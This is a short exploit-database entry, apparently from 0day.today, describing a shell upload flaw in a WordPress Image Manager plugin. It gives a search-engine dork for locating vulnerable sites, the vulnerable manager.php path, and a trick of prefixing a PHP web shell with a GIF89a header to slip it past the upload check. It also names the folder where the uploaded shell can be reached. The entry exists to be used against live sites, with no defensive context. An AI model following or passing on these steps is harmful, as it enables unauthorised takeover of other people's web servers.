id: 10089
date: 12/05/2009
title: Wordpress Image Manager Plugins Shell Upload Vulnerability
author: DigitALL
cves: 

==========================================================
Wordpress Image Manager Plugins Shell Upload Vulnerability
==========================================================

# Exploit Title: Wordpress Image Manager Plugins Shell Upload Vulnerability
 
# Version: No Version All WordPress Systems
 
Dork: inurl:"/plugins/ImageManager/manager.php"
 
/plugins/ImageManager/manager.php
 
Your Shell Top
 
GIF89a;
<?
-----
?>
 
And Upload Your Shell. Your Shell Go To /demo_images/



#  0day.today [2023-03-23]  #